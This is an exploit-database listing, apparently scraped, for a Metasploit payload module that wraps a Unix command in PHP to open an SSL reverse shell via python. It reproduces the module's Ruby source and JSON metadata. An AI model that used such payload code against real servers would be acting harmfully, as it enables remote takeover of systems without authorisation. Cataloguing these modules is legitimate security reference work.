OS Command Exec, Unix Command Shell, Reverse TCP SSL (via...

Description

Execute an OS command from PHP. Creates an interactive shell via python, uses SSL, encodes with base64...

Basic Information

ID MSF:PAYLOAD-PHP-UNIX-CMD-REVERSE_PYTHON_SSL-

Published Aug 28, 2025 at 18:54

Modified Jun 9, 2025 at 18:51

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
include Msf::Payload::Adapter

def initialize(info = {})
super(
update_info(
info,
'Name' => 'OS Command Exec',
'Description' => 'Execute an OS command from PHP',
'Author' => 'Spencer McIntyre',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'License' => MSF_LICENSE,
'AdaptedArch' => ARCH_CMD,
'AdaptedPlatform' => 'unix'
)
)
end

def generate(_opts = {})
payload = super

vars = Rex::RandomIdentifier::Generator.new(language: :php)

<<~TEXT
#{Msf::Payload::Php.preamble(vars_generator: vars)}
#{Msf::Payload::Php.system_block(vars_generator: vars, cmd: payload)}
?>
TEXT
end
end

{
    "lastseen": "2025-08-29T17:11:41",
    "description": "Execute an OS command from PHP. Creates an interactive shell via python, uses SSL, encodes with base64...",
    "published": "2025-08-28T18:54:17",
    "modified": "2025-06-09T18:51:26",
    "type": "metasploit",
    "title": "OS Command Exec, Unix Command Shell, Reverse TCP SSL (via python)",
    "source": "",
    "references": "",
    "id": "MSF:PAYLOAD-PHP-UNIX-CMD-REVERSE_PYTHON_SSL-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nmodule MetasploitModule\n  include Msf::Payload::Adapter\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'OS Command Exec',\n        'Description' => 'Execute an OS command from PHP',\n        'Author' => 'Spencer McIntyre',\n        'Platform' => 'php',\n        'Arch' => ARCH_PHP,\n        'License' => MSF_LICENSE,\n        'AdaptedArch' => ARCH_CMD,\n        'AdaptedPlatform' => 'unix'\n      )\n    )\n  end\n\n  def generate(_opts = {})\n    payload = super\n\n    vars = Rex::RandomIdentifier::Generator.new(language: :php)\n\n    <<~TEXT\n      #{Msf::Payload::Php.preamble(vars_generator: vars)}\n      #{Msf::Payload::Php.system_block(vars_generator: vars, cmd: payload)}\n      ?>\n    TEXT\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/adapters/php/unix/cmd.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/payload/php/unix/cmd/reverse_python_ssl/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

OS Command Exec, Unix Command Shell, Reverse TCP SSL (via python)_MSF:PAYLOAD-PHP-UNIX-CMD-REVERSE_PYTHON_SSL-

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply